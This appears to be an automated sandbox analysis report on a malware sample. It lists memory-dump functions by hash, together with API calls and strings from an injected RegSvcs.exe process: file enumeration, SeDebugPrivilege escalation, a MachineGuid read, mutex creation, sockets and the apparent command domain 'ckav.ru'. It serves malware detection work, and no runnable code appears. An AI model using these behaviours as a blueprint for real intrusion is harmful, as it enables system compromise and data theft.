Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aba0ae44a75bf9c43e65d40d091d9388e62f21c1b1d57edc6260d395541346f
Instruction ID: 3647fc9119f2b0e751e3cddf8e126118302a9208d656aa47816a6ece614ed1db
Opcode Fuzzy Hash: 2aba0ae44a75bf9c43e65d40d091d9388e62f21c1b1d57edc6260d395541346f
Instruction Fuzzy Hash: 39C08C7A11C3E28ED282EBAD84D7645FF201FA2301F98C48BC5CC4D08389614907CB2A

Function 056AA7C8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90

Function 056A1800 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 521086010225b72240a406fdc380e675f94153c499f89935994dbfa5de03e5cf
Instruction ID: 76a3d17c7c0d6d4f903e3a99e217563c0db33b21e7e70e7cea6df7d6d17e2474
Opcode Fuzzy Hash: 521086010225b72240a406fdc380e675f94153c499f89935994dbfa5de03e5cf
Instruction Fuzzy Hash: C5C09B5D35D1C197C544E75C44C5726F6E1DF92700F54CC4979884B242C5258C17DF56

Function 056A3DE9 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60e768078232da576f9f6ceff5b02a03f3004b7721dc85ccc879f8b733fa72f8
Instruction ID: 2eee6379b80e3ed93f7ba86802f475347d82ec910c5a721a69b84d649f2fed98
Opcode Fuzzy Hash: 60e768078232da576f9f6ceff5b02a03f3004b7721dc85ccc879f8b733fa72f8
Instruction Fuzzy Hash: FDB0922E28828056C688AAA68442B06A6E19BA9651F48C859A5888A252C1A98D13DF26

Function 056A7A40 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db8843ab96c1579d077d45fc4385504311aa78c2e82d181fbe2477f86e5509b
Instruction ID: 903adab198747b286bf225ed8bd06baf67179a7dc91f1f918778329346a0cf40
Opcode Fuzzy Hash: 2db8843ab96c1579d077d45fc4385504311aa78c2e82d181fbe2477f86e5509b
Instruction Fuzzy Hash: E9B0922604D6942BCA052B75E40A31ABEB29B83204F0888A8C0C080666D82F4208C326

Non-executed Functions

Function 07B014D8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad660a52dd7f29dfc2ca601501c7e9028a2199b48444fb5387794bf33307c8cd
Instruction ID: 0f110598df0f3cd215410a96b04d3665e3dd574c664b83dd5c1b28519c30220d
Opcode Fuzzy Hash: ad660a52dd7f29dfc2ca601501c7e9028a2199b48444fb5387794bf33307c8cd
Instruction Fuzzy Hash: F9E1E8B4E102198FDB14DFA9C5809AEBBF2FF89304F2481A9E415AB355D734AD41CFA1

Function 07B02CD8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4379d61821bd5ec56ee1a9ca0aede52a859320af4c93c0e5b64af05f426964c
Instruction ID: 89f9fcfd50f82f76b9f588b705cfb45b96cc457d0a8afc88c6c5fb97b1f4cc23
Opcode Fuzzy Hash: f4379d61821bd5ec56ee1a9ca0aede52a859320af4c93c0e5b64af05f426964c
Instruction Fuzzy Hash: 7EE128B4E001198FDB14DFA9C5849AEBBF2FF88304F2481A9D414AB355D735AD45CFA1

Function 07B00C68 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82bf2f6f0d9622b26d7662d7479276648ba06a324d77023c8d96782373378221
Instruction ID: e8b4904cdc6efe1343721882ad5b9abb4b4629f2d5d14c8795fabd1455587701
Opcode Fuzzy Hash: 82bf2f6f0d9622b26d7662d7479276648ba06a324d77023c8d96782373378221
Instruction Fuzzy Hash: 27E10AB4E001198FDB14DFA9C580AAEFBB2FF89304F2481A9D458AB355D735AD41CFA1

Function 07B03110 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55e0e60827986f857349dbf22e4598d5286786806f938a13567ddcb2cd989b67
Instruction ID: f8608bef4b110a3411b4f983d8d2a9c3ce493e19711b2894c2dfc538963821ec
Opcode Fuzzy Hash: 55e0e60827986f857349dbf22e4598d5286786806f938a13567ddcb2cd989b67
Instruction Fuzzy Hash: B8E107B4E101198FDB14DFA9C9849AEBBF2FF89304F2481A9E414AB355D734AD41CFA1

Function 07B010A0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4777ee7302bbaa37faa19f8067f7a22ed86d475a8f34fc4f184f2419d6caec84
Instruction ID: cccbff33dfd02da9910cf4b0dde9775c29cabac3d6365da8cd67ea2075924352
Opcode Fuzzy Hash: 4777ee7302bbaa37faa19f8067f7a22ed86d475a8f34fc4f184f2419d6caec84
Instruction Fuzzy Hash: 78E1D6B4E10119CFDB14DFA9C5809AEBBB2FF89304F2481A9E418AB355D735A941CFA1

Function 056A2757 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1104825b446eb95b64bc3d895dbc44129216e0a04d775e19bc71feb8a5a3099a
Instruction ID: a2613c845e7c565d0dc4c1924af222026239b43122b572fc677443539ae4082d
Opcode Fuzzy Hash: 1104825b446eb95b64bc3d895dbc44129216e0a04d775e19bc71feb8a5a3099a
Instruction Fuzzy Hash: 55D1E675820A5ACACB00EF65D990699B771FF95300F20DB9AE40A77650EB706AC5CF81

Function 056A2768 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 663f1fd30fbb1f48c8933ffee1840aa41d9f4c0104b81487bf35e71f96bf347f
Instruction ID: 4afbbbeeea3042557bdda9e995336ce564c2e73b95d1eb3d0bfccb0b6802fbfc
Opcode Fuzzy Hash: 663f1fd30fbb1f48c8933ffee1840aa41d9f4c0104b81487bf35e71f96bf347f
Instruction Fuzzy Hash: D6D1F635820A5ACACB10EF69D990699B771FF95300F20DB9AE40A77614EF706EC5CF81

Function 0187E274 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2346644915.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1870000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ab874f71eecaf2ec266f79044eb75ae283c41479e71337f9be95d13eb7bef2c
Instruction ID: 61766dda6601f1ad6a4bbbb8e9339fff5ec045cd541fc0d0f4910eb23ecb944a
Opcode Fuzzy Hash: 6ab874f71eecaf2ec266f79044eb75ae283c41479e71337f9be95d13eb7bef2c
Instruction Fuzzy Hash: 27A17232E1021ACFCF09DFB9C4445AEBBB2FF84300B1545AAE915EB265DB71EA45CB40

Function 07B03100 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad7cdf683758a31ed51bd8c3a47fbab3bf0d8577c8ffd984e0f099f076cec4af
Instruction ID: 851e17130c25a810c1bc4eec62c66b67f208fbf21f70d3082c58bc4536908029
Opcode Fuzzy Hash: ad7cdf683758a31ed51bd8c3a47fbab3bf0d8577c8ffd984e0f099f076cec4af
Instruction Fuzzy Hash: 3F51FEB4E102198FDB14CFA9C9845AEBBF2FF89304F24C1AAD418A7355D7355941CFA1

Function 07B02CC8 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 552e20087d635c34f3ff1e6f4188fe4ca882e95b8e420753ecfd2bb5ae45cc7b
Instruction ID: da8349f457fd9203f6287744d32a9b8c9aaac6fb84479ecbf0aa1938f0c3414b
Opcode Fuzzy Hash: 552e20087d635c34f3ff1e6f4188fe4ca882e95b8e420753ecfd2bb5ae45cc7b
Instruction Fuzzy Hash: B85108B4E102198BDB14CFA9C5845AEBBF2FF89304F24C1AAD418AB355D7349A45CFA1

Analysis Process: RegSvcs.exePID: 2568, Parent PID: 5016COMMON

Execution Graph

Execution Coverage:	31.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	93

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

%s\*, xrefs: 00403D99
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Program Files, xrefs: 00403E01
Windows, xrefs: 00403DEA

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
